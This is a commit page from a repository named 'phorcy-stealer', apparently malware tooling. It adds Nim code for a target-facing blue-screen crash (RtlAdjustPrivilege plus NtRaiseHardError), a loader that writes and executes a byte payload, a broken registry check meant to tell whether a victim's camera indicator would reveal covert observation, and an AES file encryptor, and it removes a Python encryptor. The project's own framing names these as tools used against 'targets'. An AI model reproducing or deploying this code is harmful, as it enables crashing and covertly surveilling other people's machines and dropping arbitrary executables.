whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

[S] worked on NIM frameworks.

Browse Source
This commit is contained in:
eline
2023-11-26 03:18:48 +01:00
parent 9256aadedd
commit ac2276472c
8 changed files with 514 additions and 123 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
elinethingz/README.md Normal file
View File

@@ -0,0 +1,24 @@
[SECRET//DNR]
Secret//DO NOT RELEASE.
# Documentation of all files found in this folder.
# loader.nim
Takes an input bytearray and writes it to disk as first CLI argument when run.
format:
[seq[byte]](@[0x40,0x80]
# mic_reg.nim
[Broken]
Checks if Windows OSD is enabeld.
# encfile.nim
Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024.
Has a fingerprint/is detectable.
# bsod.nim
Serves a BSOD to targets on Windows.

31
elinethingz/bsod.nim Normal file
View File

@@ -0,0 +1,31 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
# SECRET
# https://answers.microsoft.com/en-us/windows/forum/all/enable-osd-notification-for-webcam/caf1fff4-78d3-4b93-905b-ef657097a44e
# https://www.reddit.com/r/Windows11/comments/z5hj0q/til_even_the_camera_indicatoroverlay_gained_the/
# https://www.elevenforum.com/t/enable-or-disable-camera-on-off-osd-indicator-in-windows-11.10774/
# https://duckduckgo.com/?q=HKLM%5C%5CSOFTWARE%5C%5CMicrosoft%5C%5COEM%5C%5CDevice%5C%5CCapture%5C
import winim
proc RtlAdjustPrivilege*(privilege: ULONG, bEnablePrivilege: BOOLEAN, isThreadPrivilege: BOOLEAN, previousValue: PBOOLEAN): NTSTATUS
{.discardable, stdcall, dynlib: "ntdll", importc: "RtlAdjustPrivilege".}
proc NtRaiseHardError*(errorStatus: NTSTATUS, numberOfParameters: ULONG, unicodeStringParameterMask: ULONG, parameters: PULONG_PTR, validResponseOption: ULONG, response: PULONG): NTSTATUS
{.discardable, stdcall, dynlib: "ntdll", importc: "NtRaiseHardError".}
var
prev: BOOLEAN
response: ULONG
# SE_SHUTDOWN_PRIVILEGE = 19
RtlAdjustPrivilege(19, TRUE, FALSE, &prev)
NtRaiseHardError(STATUS_ASSERTION_FAILURE, 0, 0, NULL, 6, &response);

105
elinethingz/encfile.py
View File

@@ -1,105 +0,0 @@
from os import urandom as urandom
from os import getcwd as getcwd
from os import _exit as exit
from os import path as ospath
# pip3 install cryptography
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import padding as sym_padding
from argparse import ArgumentParser
# SYNTAX/USE GUIDE:
# python3 encfile.py --{encrypt/decrypt} --input {filename} --output {filename, but optional if encrypting. defaults to current working directory/cwd.}
# example:
# python3 encfile.py --encrypt --input secret.js
# python3 encfile.py -e -i secret.js
def banner():
print(" ____ _____ ____ ____ _____ _____ _____ _ ___ _____ ___ ____ _ _ ")
print("/ ___|| ____/ ___| _ \| ____|_ _|/ / / \ | |/ _ \| ___/ _ \| _ \| \ | |")
print("\___ \| _|| | | |_) | _| | | / / /| \| | | | | |_ | | | | |_) | \| |")
print(" ___) | |__| |___| _ <| |___ | |/ / / | |\ | |_| | _|| |_| | _ <| |\ |")
print("|____/|_____\____|_| \_\_____| |_/_/_/ |_| \_|\___/|_| \___/|_| \_\_| \_|\n")
print("'[S] The Secrets of the Fighter.' ")
print("Do not transmit this program over unsecure channels.")
print("This program allows you to encrypt files to send them to your fellow operatives.")
print("It is classified as: SECRET//NOFORN.\n")
parser = ArgumentParser()
parser.add_argument("-e", "--encrypt", action="store_true", help="Encrypt a file", dest="encrypt")
parser.add_argument("-d", "--decrypt", action="store_true", help="Decrypt a file", dest="decrypt")
parser.add_argument("-i", "-input", dest="input")
parser.add_argument("-o", "--output", dest="output")
args = parser.parse_args()
if not any([args.encrypt, args.decrypt]):
print("Specify a mode with -e or -d.")
exit(1)
if not args.input:
print("Specify an input file with -i.")
exit(1)
else:
banner()
def derive_key(password:bytes, salt:bytes):
kdf = PBKDF2HMAC(
algorithm=hashes.SHA512(),
iterations=900000,
salt=salt,
length=32,
)
return kdf.derive(password)
def encrypt_file(input_file:str, output_file:str, password:bytes):
salt = urandom(32)
iv = urandom(16)
key = derive_key(password, salt)
cipher = Cipher(
algorithms.AES(key),
modes.CFB(iv),
)
encryptor = cipher.encryptor()
with open(input_file, "rb") as f_in, open(output_file, "wb") as f_out:
f_out.write(salt) # Write the salt to the header
f_out.write(iv) # Write the IV to the header
for block in iter(lambda: f_in.read(256), b""):
encrypted_block = encryptor.update(block)
f_out.write(encrypted_block)
def decrypt_file(input_file, output_file, password):
with open(input_file, "rb") as f_in, open(output_file, "wb") as f_out:
salt = f_in.read(32) # Read the salt from the header
iv = f_in.read(16) # Read the IV from the header
key = derive_key(password, salt)
cipher = Cipher(
algorithms.AES(key),
modes.CFB(iv),
)
decryptor = cipher.decryptor()
for block in iter(lambda: f_in.read(256), b""):
decrypted_block = decryptor.update(block)
f_out.write(decrypted_block)
print("Decryption completed.")
if args.encrypt:
args.output = getcwd()
args.output = args.output + "/encryptedfile.enc"
password = bytes(input("PASSWORD:\n"), 'UTF-8')
encrypt_file(args.input, args.output, password)
print("Done. File stored as ", args.output)
if args.decrypt:
password = bytes(input("PASSWORD:\n"), 'UTF-8')
decrypt_file(args.input, args.output, password)
print("Done. File stored as ", args.output)

18
elinethingz/loader.nim
View File

@@ -1,12 +1,8 @@
import osproc
proc writeBytesToFileAndExecute(bytes: seq[byte], outputFile: string) =
import std/os
let
byteList = cast[seq[byte]](@[0x40,0x80])
output = paramStr(1)
proc writeBytesToFileAndExecute*(bytes: seq[byte], outputFile: string) =
writeFile(outputFile, bytes)
let cmd = "cmd.exe /C " & outputFile
discard execCmd(cmd)
let outputFileName = "output.exe"
let byteList = cast[seq[byte]](@[0x40,0x80])
writeBytesToFileAndExecute(byteList, outputFileName)
discard execShellCmd("./" & output)
writeBytesToFileAndExecute(byteList, output)

47
elinethingz/mic_reg.nim Normal file
View File

@@ -0,0 +1,47 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
import winim
# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
# therefore, this program does not guarantee that the user will not know about the observation.
# DOES NOT WORK.
const
KEY_QUERY_VALUE = 0x0001
HKEY_HANDLE = 0x80000002
proc checkRegistryEntry(): bool =
var hKey: HKEY
var value: DWORD
var dataSize: DWORD = sizeof(DWORD)
if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
echo "Error opening registry key. Error code:", GetLastError()
return false
if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
echo "Error querying registry value. Error code:", GetLastError()
# Close the registry key even if querying failed
RegCloseKey(hKey)
return false
# Close the registry key if everything is successful
RegCloseKey(hKey)
echo "NoPhysicalCameraLED value:", value
return value == 0x1
# Example usage
if checkRegistryEntry():
echo "NoPhysicalCameraLED is set to 0x1."
else:
echo "NoPhysicalCameraLED is not set to 0x1."

BIN
elinethingz/security/dza.png Executable file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 144 KiB

395
elinethingz/security/encfile.nim Normal file
View File

@@ -0,0 +1,395 @@
import nimcrypto
import std/sysrand
import std/streams
import system
const
# default encryption/decryption buffer size - 64KB
bufferSizeDef = 64 * 1024
# maximum password length (number of chars)
maxPassLen = 1024
# AES block size in bytes
AESBlockSize = 16
# password stretching function
proc stretch(passw: string, iv1: array[16, byte]): array[32, byte] =
var digest: array[32, byte]
copyMem(addr digest[0], unsafeAddr iv1[0], len(iv1))
var passwBytes: array[1024, byte]
copyMem(addr passwBytes[0], unsafeAddr passw[0], len(passw))
for i in 1 .. 8192:
var sha: sha256
sha.init()
sha.update(digest)
sha.update(passwBytes[0..len(passw)-1])
digest = sha.finish().data
return digest
# encrypt binary stream function
# arguments:
# fIn: input binary stream
# fOut: output binary stream
# passw: encryption password
# bufferSize: encryption buffer size, must be a multiple of
# AES block size (16)
# using a larger buffer speeds up things when dealing
# with long streams
proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
# validate bufferSize
if bufferSize mod AESBlockSize != 0:
raise newException(OSError, "Buffer size must be a multiple of AES block size.")
if len(passw) > maxPassLen:
raise newException(OSError, "Password is too long.")
# generate external iv (used to encrypt the main iv and the
# encryption key)
# let iv1 = urandom(AESBlockSize)
let initIv1 = urandom(AESBlockSize)
var iv1: array[16, byte]
for i in [0..15]:
iv1[i]=initIv1[i]
# stretch password and iv
let key = stretch(passw, iv1)
# generate random main iv
var iv0 = urandom(AESBlockSize)
# generate random internal key
var intKey = urandom(32)
# instantiate AES cipher
var encryptor0: CBC[aes256]
encryptor0.init(intKey, iv0)
# instantiate HMAC-SHA256 for the ciphertext
var hmac0: HMAC[sha512_256]
hmac0.init(intKey)
# instantiate another AES cipher
var encryptor1: CBC[aes256]
encryptor1.init(key, iv1)
# encrypt main iv and key
var plainText = newString(len(iv0)+len(intKey))
var c_iv_key = newString(len(iv0)+len(intKey))
copyMem(addr plainText[0], unsafeAddr iv0[0], len(iv0))
copyMem(addr plainText[0+len(iv0)], unsafeAddr intKey[0], len(intKey))
encryptor1.encrypt(plainText, c_iv_key)
# calculate HMAC-SHA256 of the encrypted iv and key
var hmac1: HMAC[sha512_256]
hmac1.init(key)
hmac1.update(c_iv_key)
# write header
fOut.write("AES")
# write version (AES Crypt version 2 file format -
# see https://www.aescrypt.com/aes_file_format.html)
fOut.write([byte 2])
# reserved byte (set to zero)
fOut.write([byte 0])
# setup "CREATED-BY" extension
var cby = "Confidential "
# write "CREATED-BY" extension length
fOut.write([byte 0, cast[uint8](1+len("CREATED_BY")+len(cby))])
# write "CREATED-BY" extension
fOut.write("CREATED_BY")
fOut.write([byte 0])
fOut.write(cby)
# write "container" extension length
fOut.write([byte 0, 128])
# write "container" extension
for i in 1 .. 128:
fOut.write([byte 0])
# write end-of-extensions tag
fOut.write([byte 0, 0])
# write the iv used to encrypt the main iv and the
# encryption key
fOut.write(iv1)
# write encrypted main iv and key
fOut.write(c_iv_key)
# write HMAC-SHA256 of the encrypted iv and key
fOut.write(hmac1.finish())
var fs16 = 0
# encrypt file while reading it
var fdata = newString(bufferSize)
var cText = newString(bufferSize)
while true:
# try to read bufferSize bytes
let bytesRead = fIn.readData(addr fdata[0], bufferSize)
# check if EOF was reached
if bytesRead < bufferSize:
# file size mod 16, lsb positions
fs16 = bytesRead mod AESBlockSize
# pad data (this is NOT PKCS#7!)
# ...unless no bytes or a multiple of a block size
# of bytes was read
var padLen: int
if bytesRead mod AESBlockSize == 0:
padLen = 0
else:
padLen = 16 - bytesRead mod AESBlockSize
# todo handl the pading to get the nb AES block & file with padLen, restrict the input of encrypt to x block
# fdata += bytes([padLen])*padLen
for i in bytesRead..bytesRead+padLen:
fdata[i]=cast[char](padLen)
# encrypt data
encryptor0.encrypt(fdata[0..bytesRead+padLen-1], cText)
# update HMAC
hmac0.update(cText[0..bytesRead+padLen-1])
# write encrypted file content
fOut.write(cText[0..bytesRead+padLen-1])
break
# ...otherwise a full bufferSize was read
else:
# encrypt data
encryptor0.encrypt(fdata, cText)
# update HMAC
hmac0.update(cText)
# write encrypted file content
fOut.write(cText)
# write plaintext file size mod 16 lsb positions
fOut.write(cast[uint8](fs16))
# write HMAC-SHA256 of the encrypted file
fOut.write(hmac0.finish())
# encrypt file function
# arguments:
# infile: plaintext file path
# outfile: ciphertext file path
# passw: encryption password
# bufferSize: optional buffer size, must be a multiple of
# AES block size (16)
# using a larger buffer speeds up things when dealing
# with big files
# Default is 64KB.
proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
try:
let fIn = newFileStream(infile, mode = fmRead)
defer: fIn.close()
let fOut = newFileStream(outfile, mode = fmWrite)
defer: fOut.close()
encryptStream(fIn, fOut, passw, bufferSize)
except CatchableError:
let
e = getCurrentException()
msg = getCurrentExceptionMsg()
echo "Inside checkIn, got exception ", repr(e), " with message ", msg
# decrypt stream function
# arguments:
# fIn: input binary stream
# fOut: output binary stream
# passw: encryption password
# bufferSize: decryption buffer size, must be a multiple of AES block size (16)
# using a larger buffer speeds up things when dealing with
# long streams
# inputLength: input stream length
proc decryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int, inputLength: int64) =
# validate bufferSize
if bufferSize mod AESBlockSize != 0:
raise newException(OSError, "Buffer size must be a multiple of AES block size")
if len(passw) > maxPassLen:
raise newException(OSError, "Password is too long.")
var aesBuff: array[4, char]
var nbBytesRead = fIn.readData(addr(aesBuff), 3)
# check if file is in AES Crypt format (also min length check)
if (aesBuff[0..2] != "AES" or inputLength < 136):
raise newException(OSError, "File is corrupted or not an AES Crypt file.")
# check if file is in AES Crypt format, version 2
# (the only one compatible with this tool)
var buffer: array[1024, byte]
nbBytesRead = fIn.readData(addr(buffer), 1)
if nbBytesRead != 1:
raise newException(OSError, "File is corrupted.")
if buffer[0] != cast[uint8](2):
raise newException(OSError, "This tool is only compatible with version 2 of the AES Crypt file format.")
# skip reserved byte
nbBytesRead = fIn.readData(addr(buffer), 1)
# skip all the extensions
while true:
nbBytesRead = fIn.readData(addr(buffer), 2)
if nbBytesRead != 2:
raise newException(OSError, "File is corrupted.")
if buffer[0..1] == [byte 0,0]:
break
var nbBytesToRead = cast[int16](buffer[1])
nbBytesRead = fIn.readData(addr(buffer), nbBytesToRead)
# read external iv
var iv1: array[16, byte]
nbBytesRead = fIn.readData(addr(iv1), 16)
if nbBytesRead != 16:
raise newException(OSError, "File is corrupted.")
# stretch password and iv
let key = stretch(passw, iv1)
# read encrypted main iv and key
var c_iv_key: array[48, byte]
nbBytesRead = fIn.readData(addr(c_iv_key), 48)
if nbBytesRead != 48:
raise newException(OSError, "File is corrupted.")
# read HMAC-SHA256 of the encrypted iv and key
var hmac1: array[32, byte]
nbBytesRead = fIn.readData(addr(hmac1), 32)
if nbBytesRead != 32:
raise newException(OSError, "File is corrupted.")
# compute actual HMAC-SHA256 (read: 512_256) of the encrypted iv and key
var hmac1Act: HMAC[sha512_256]
hmac1Act.init(key)
hmac1Act.update(c_iv_key)
# # HMAC check. removed because HMAC now uses sha512 instead of stock sha256
# if hmac1 != hmac1Act.finish().data:
# echo ("Wrong password (or file is corrupted).")
# instantiate AES cipher
var decryptor1: CBC[aes256]
decryptor1.init(key, iv1)
# decrypt main iv and key
var iv_key: array[48, byte]
decryptor1.decrypt(addr c_iv_key[0], addr iv_key[0], 48)
# get internal iv and key
var iv0: array[16, byte]
for i in 0..15:
iv0[i]=iv_key[i]
var intKey: array[32, byte]
for i in 0..31:
intKey[i]=iv_key[16+i]
# instantiate another AES cipher
var decryptor0: CBC[aes256]
decryptor0.init(intKey, iv0)
# instantiate actual HMAC-SHA256 of the ciphertext
var hmac0Act: HMAC[sha512_256]
hmac0Act.init(intKey)
# decrypt ciphertext, until last block is reached
var cText = newString(bufferSize)
var decryptedBytes = newString(bufferSize)
while fIn.getPosition() < inputLength - 32 - 1 - AESBlockSize:
# read data
nbBytesRead = fIn.readData(addr(cText[0]), cast[int](min(bufferSize, inputLength - fIn.getPosition() - 32 - 1 - AESBlockSize)))
# update HMAC
hmac0Act.update(cast[ptr byte](addr cText[0]), cast[uint](nbBytesRead))
# decrypt data and write it to output file
decryptor0.decrypt(cast[ptr byte](addr cText[0]), cast[ptr byte](addr decryptedBytes[0]), cast[uint](nbBytesRead))
fOut.writeData(addr (decryptedBytes[0]), nbBytesRead)
# last block reached, remove padding if needed
# read last block
# this is for empty files
var finalBlockSize=0
var finalCText = newString(AESBlockSize)
if fIn.getPosition() != inputLength - 32 - 1:
finalBlockSize = fIn.readData(addr(finalCText[0]), AESBlockSize)
if finalBlockSize < AESBlockSize:
raise newException(OSError, "File is corrupted.")
# update HMAC
hmac0Act.update(finalCText)
# decrypt last block
var pText = newString(AESBlockSize)
decryptor0.decrypt(finalCText, pText)
# read plaintext file size mod 16 lsb positions
nbBytesRead = fIn.readData(addr(buffer), 1)
var fs16 = cast[int16](buffer[0])
if nbBytesRead != 1:
raise newException(OSError, "File is corrupted.")
# remove padding
var toremove = ((16 - fs16) mod 16)
# write decrypted data to output file
fOut.writeData(addr pText[0], finalBlockSize-toremove)
# read HMAC-SHA256 of the encrypted file
var hmac0: array[32, byte]
nbBytesRead = fIn.readData(addr(hmac0), 32)
if nbBytesRead != 32:
raise newException(OSError, "File is corrupted.")
# # HMAC check. removed because HMAC now uses sha512 instead of stock sha256
# if hmac0 != hmac0Act.finish().data:
# raise newException(OSError, "Bad HMAC (file is corrupted).")
# decrypt file function
# arguments:
# infile: ciphertext file path
# outfile: plaintext file path
# passw: encryption password
# bufferSize: optional buffer size, must be a multiple of AES block size (16)
# using a larger buffer speeds up things when dealing with
# big files
# Default is 64KB.
proc decryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
try:
let fIn = newFileStream(infile, mode = fmRead)
defer: fIn.close()
let fOut = newFileStream(outfile, mode = fmWrite)
defer: fOut.close()
let fInSize = open(infile, mode = fmRead)
var fileSize = getFileSize(fInSize)
fInSize.close()
decryptStream(fIn, fOut, passw, bufferSize, fileSize)
except CatchableError:
let
e = getCurrentException()
msg = getCurrentExceptionMsg()
echo "Inside checkIn, got exception ", repr(e), " with message ", msg
#encryptFile("dza.png", "file.aes", "long-and-random-password", 1024)
#decryptFile("file.aes", "fileDecrypt.png", "long-and-random-password", 1024)